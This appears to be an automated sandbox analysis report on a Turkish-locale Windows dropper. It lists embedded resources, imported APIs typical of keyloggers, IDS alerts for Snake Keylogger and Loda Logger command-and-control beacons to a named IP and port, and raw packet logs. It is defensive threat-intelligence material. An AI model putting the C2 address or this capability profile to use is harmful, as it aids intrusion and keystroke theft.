RT_STRING | 0xb59d4 | 0x2d4 | data |  |  | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data |  |  | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data |  |  | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data |  |  | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data |  |  | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data |  |  | 0.6
RT_STRING | 0xb6894 | 0x320 | data |  |  | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data |  |  | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data |  |  | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data |  |  | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data |  |  | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data |  |  | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data |  |  | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data |  |  | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data |  |  | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data |  |  | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data |  |  | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data |  |  | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data |  |  | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data |  |  | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data |  |  | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0xb8e14 | 0xe8800 | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |  |  | 0.90439453125
RT_RCDATA | 0x1a1614 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x1a1618 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x1a5218 | 0x64c | data |  |  | 0.5998759305210918
RT_RCDATA | 0x1a5864 | 0x153 | Delphi compiled form 'TFormVir' |  |  | 0.7522123893805309
RT_RCDATA | 0x1a59b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x1aa18c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0x1aa1a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
RT_GROUP_CURSOR | 0x1aa1b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1aa1c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1aa1dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1aa1f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_CURSOR | 0x1aa204 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
RT_GROUP_ICON | 0x1aa218 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1aa22c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll | OpenSCManagerA, CloseServiceHandle
wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll | Netbios
Language of compilation system: Turkish
Country where language is spoken: Turkey
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50187 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49976 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50184 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50193 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50122 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50192 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50190 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50191 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49733 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50075 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49895 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:22:53.186630+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49787 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:05.795485+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49709 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:05.801070+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.5 | 49712 | 69.42.215.252 | 80 | TCP |
| 2024-12-30T11:23:05.887437+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49710 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:06.778768+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49714 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:06.959783+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49718 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:07.796755+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49720 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:07.965147+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49722 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:08.462207+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.5 | 49733 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:08.462207+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49733 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:08.750160+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49726 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:08.750257+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49728 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:09.727637+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49736 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:09.837082+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49737 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:10.706964+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49742 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:10.809718+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49744 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:11.685563+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49745 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:11.804812+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49747 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:12.674533+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49752 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:12.752833+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49754 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:13.726436+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49759 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:13.746094+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49761 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:14.734629+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49765 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:14.734634+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49766 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:15.711791+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49771 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:15.723739+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49772 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:16.765381+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49776 | 142.250.186.110 | 443 | TCP |
| 2024-12-30T11:23:17.473983+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49787 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:26.489788+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49895 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:35.662421+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49976 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:44.678862+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50075 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:53.696742+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.5 | 50122 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:23:53.696742+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50122 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:02.803353+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50184 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:12.073961+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50187 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:21.130302+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50190 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:35.083170+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50191 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:44.315371+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.5 | 50192 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:44.315371+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50192 | 172.111.138.100 | 5552 | TCP |
| 2024-12-30T11:24:53.349189+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 50193 | 172.111.138.100 | 5552 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                      Dec 30, 2024 11:23:06.450275898 CET49716443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.495331049 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.499269962 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.499284029 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.499387026 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.499387980 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.502554893 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.502556086 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.502568960 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.502576113 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.502829075 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.504277945 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.504283905 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.504313946 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.504638910 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.551341057 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.778759956 CET44349714142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.778918982 CET49714443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.778937101 CET44349714142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.779016972 CET49714443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.779023886 CET44349714142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.779067993 CET44349714142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.779086113 CET49714443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.779086113 CET49714443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.779093027 CET44349714142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.779120922 CET49714443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.779834032 CET49720443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.779875994 CET44349720142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.779947042 CET49720443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.780145884 CET49720443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.780158043 CET44349720142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.832417011 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.832472086 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.832499027 CET49716443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.832520008 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.832542896 CET49716443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.832603931 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.832849979 CET49716443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.838644028 CET49716443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.838659048 CET44349716142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.839382887 CET49721443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.839433908 CET44349721142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.839607954 CET49721443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.840173006 CET49721443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.840186119 CET44349721142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.959745884 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.959861994 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.959896088 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.960153103 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.960154057 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.960196018 CET44349718142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.960289001 CET49718443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.960779905 CET49722443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.960819006 CET44349722142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.960928917 CET49722443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.961246014 CET49722443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:06.961256027 CET44349722142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992590904 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992635012 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992661953 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.992676020 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992703915 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.992728949 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.992734909 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992749929 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.992942095 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.993803978 CET49717443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.993810892 CET44349717142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.994447947 CET49723443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.994493961 CET44349723142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:06.994600058 CET49723443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.994885921 CET49723443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:06.994903088 CET44349723142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:07.423576117 CET44349720142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:07.423655987 CET49720443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:07.424309969 CET44349720142.250.186.110192.168.2.5
